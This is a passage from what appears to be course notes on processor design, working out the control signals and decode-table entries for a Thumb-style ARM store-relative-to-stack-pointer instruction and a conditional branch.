The immediate value must be multiplied by 4 before being added to the stack pointer to form the address; we will use the shifter to perform this multiplication, and the ALU to add the result to the stack pointer. The particular instruction str r0, [sp, #48] is encoded as

10010 000 00001100

We'll begin by reading some registers. The plan is to use the stack pointer as the first ALU operand, the offset as the second operand (so we don't care what register is read), and to feed to the data memory the value of the register specified in field [10:8] of the instruction.

cRegSelA = Rsp
cRegSelB = __
cRegSelC = Rw

If we replace the don't care value __ with Rx, and that will mean that, for this particular instruction, it will be r4 that is uselessly read, because the bottom three bits of the instruction are 100.

The shifter input is taken from an 8-bit immediate field, and the shifter is set to shift left by 2 bits.

cRand2 = Imm8
cShiftOp = Lsl
cShiftAmt = Sh2

The ALU is set to add.

cAluOp = Add

The instruction doesn't write the flags, doesn't perform a memory read, but does perform a write.

cFlags = False
cMemRd = False
cMemWr = True

It isn't a subroutine call, so doesn't set lr, and as a store instruction it writes no value back into a register.

cLink = N
cRegWrite = N

Here's the resulting line in the decoding table.

--    cRegA                 cShiftOp      cFlags   cLink
--     |   cRegB      cRand2 |   cShiftAmt | cMemRd | cRegWrite
--     |    |   cRegC  |     |    | cAluOp |  | cMemWr |  mnem     
--     |    |    |     |     |    |    |   |  |  |  |  |   |
18 -> (Rsp, __,  Rw,  Imm8, Lsl, S2,  Add, F, F, T, N, N, "str sp")

bgt label

This conditional branch instruction contains the code for condition gt and a signed 8-bit offset.

Bgt format.png

The offset is in two's-complement form, needs to be multiplied by 2, and is relative to pc+4. Thus a branch instruction bgt .-4 that branches back to the instruction next but one preceding itself will have an offset of -8 encoded as

1101 1100 11111100

There is nothing we must do to feed the condition to the functional unit that evaluates it, because that unit functions all the time, even if the condition it is being fed is nonsense. What we must do is set up the rest of the datapath to compute the branch target address and conditionally write it to the pc in place of the default value that is the address of the next instruction.

The register file reads out the value of pc as pc+4 for the sake of other instructions that might read the pc, so we need just

cRegSelA = Rpc
cRegSelB = __
cRegSelC = Rpc

The pc value forms one input to the ALU, and the other is the sign-extended immediate field, shifted left by 1.

cRand2 = SImm8
cShiftOp = Lsl
cShiftAmt = Sh1

The ALU is set to add the offset to the pc value

cAluOp = Add

Branch instructions do not set the flags, and do not need a read or write cycle from the memory.

cFlags = False
cMemRd = False
cMemWr = False

This branch instruction does not set lr, and it writes the pc only if the condition is satisfied.

cLink = N
cRegWrite = C

Note that the fifth bit of the opcode overlaps with the high-order bit of the condition, so both 26 and 27 are opcodes corresponding to this instruction.

--    cRegA                 cShiftOp      cFlags   cLink
--     |   cRegB      cRand2 |   cShiftAmt | cMemRd | cRegWrite
--     |    |   cRegC  |     |    | sAluOp |  | cMemWr |  mnem     
--     |    |    |     |     |    |    |   |  |  |  |  |   |
26 -> (R15, __,  R15, SI8,  Lsl, S1,  Add, F, F, F, N, C, "bcond")
27 -> (R15, __,  R15, SI8,  Lsl, S1,  Add, F, F, F, N, C, "bcond")